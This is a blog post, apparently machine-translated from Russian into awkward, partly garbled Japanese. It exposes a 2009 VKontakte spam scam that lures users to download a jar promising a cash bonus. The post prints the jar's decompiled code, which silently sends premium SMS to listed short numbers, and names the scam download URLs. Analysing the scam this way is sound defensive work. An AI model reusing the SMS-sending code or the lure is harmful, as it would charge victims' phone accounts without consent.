サンドボックス内の投稿、または長い間アカウントを持っていることを忘れていました。

どういうわけか、気付かれずに、ここ2週間でハブのヘッダーを見始めました。突然、サンドボックスに投稿を書くことで招待を得ることができる投稿を見つけました。 このまさに「サンドボックス」の内容を見て、若者向けにノスタルジックに購入された2.5 Lバビエに触発された後、小さなメモを作成しました(以下のテキスト)。 朝3時近くだったので、ついに寝るつもりでした。 しかし、突然、私の投稿でページを更新すると、「ページが見つかりません(404番目のエラー)」という奇妙なメッセージが表示されました。 一方、招待状がメールで発見されました。 理由で404点を獲得し、招待で喜び、私は登って登録しました。 ログインが既に行われているのを見たときの驚きを想像してください。 さらに、すべてがシンプルでした-メールへのパスワードをリセットし、サイトにログインするためのリンク。 すでに7月にここに登録したことが判明しましたが、それを完全に忘れていました。 2つの質問は、招待がどのように私に来たか(それが私の投稿に関連しているかどうか)と、投稿が実際に消えた場所は不明です。 )



次は消えた同じテキストで、困惑してbainkiに行きます:



VKontakteスパムについてこのトピックのPPSで書かれていたように(偶然にも偽物でした )、「投稿を書いている間、ウイルスはアカウントから600ルーブルを削除するという情報を受け取っていました。」

「SMSを短い番号に送信して600を無料にする」などの「未確認情報」に非常によく似ているため、このような「未確認情報」には常に驚かされました。 それでは、切望されている現金ボーナスを無料で手に入れたい貧しい仲間に何が起こるかを考えてみましょう。

もちろん、彼の行動を繰り返しますが、それらを正確に繰り返すことはしません。

1.トピックで言及されているURL http://vkpresents.ru/に移動し、[ログイン]ボタンをクリックします。 はい、確かに、「現時点でのボーナスは500ルーブルです!」

2.ボーナスを取得するには、 http://bonus.vkpresents.ru/yes/go.php?id = 1で jarをダウンロードする必要があります。 ダウンロード。

3.最も興味深いのは、この神秘的なジャーが何をするかです。 まず、開梱しましょう:すぐに満足します -ico.pngファイル、META-INFディレクトリ(jarの標準)およびHotSex.classファイル(!)

実際、このホットファイルにはすべての魔法も含まれています。 ご存じのとおり、 Javaプログラムは仮想Javaマシンによって実行されるバイトコードに変換されるため、このバイトコードは元のJavaコードを逆コンパイルして復元するのが非常に簡単です。 jadjd-guiなどのJavaデコンパイラーを使用します。

だから、ここに無料のチーズが実際にどのように見えるかがあります:



public void startApp() {

String number;

MessageConnection messageconnection;

TextMessage textmessage;

for (int i = 0; i < 3; ) {

try {

number = "sms://1171";

if (i == 0)

number = "sms://" + getAppProperty("a");

if (i == 1)

number = "sms://" + getAppProperty("b");

if (i == 2)

number = "sms://" + getAppProperty("e");

messageconnection = (MessageConnection)Connector.open(number);

textmessage = (TextMessage)messageconnection.newMessage("text");

textmessage.setPayloadText("" + getAppProperty("kis"));

messageconnection.send(textmessage);

}

catch (Exception exception)

{

}

++i;

}



...







明らかに、このコードは異なる番号にsmsを送信しようと数回試行します。デフォルトは1171です。getAppProperty()を使用してコードにアクセスするMETA-INF / MANIFEST.MFにある他のものを見てみましょう。

kis: fasax 1340

wix: xasex 1340

a: 1171

b: 1161

c: 9099

d: 9099

e: 1161







これは、悪意のあるプログラムがSMSを送信しようとしているまさにその数です:) Googleの番号1171へSMSリクエストの最初の結果は、無料のSMSを送信しようとする詐欺師の議論へのリンクを提供します。 したがって、SMSを送信しようとする試みはコード8のみで行われ、各SMS 5 cuが削除されると考える場合。 -最後に、すべてのSMSが送信に成功した場合、アカウントから引き落とされる40ドルというかなり印象的な金額を受け取ります。 正確な量については、幸いなことに、私は知りませんが、言及された600ルーブルはおそらく平均値です:)

要約すると。 配線はもちろん非常に弱く、少なくとも一人がそのように振る舞うことはないと思います、そして実際、2009年は庭にいます、それはもっと独創的なものを思い付く時です:)それにもかかわらず、クラスHotSex.classの名前は明らかにこのjar -kaは、無料でポルノを視聴することが提案されている別の配線から取られました:)



All Articles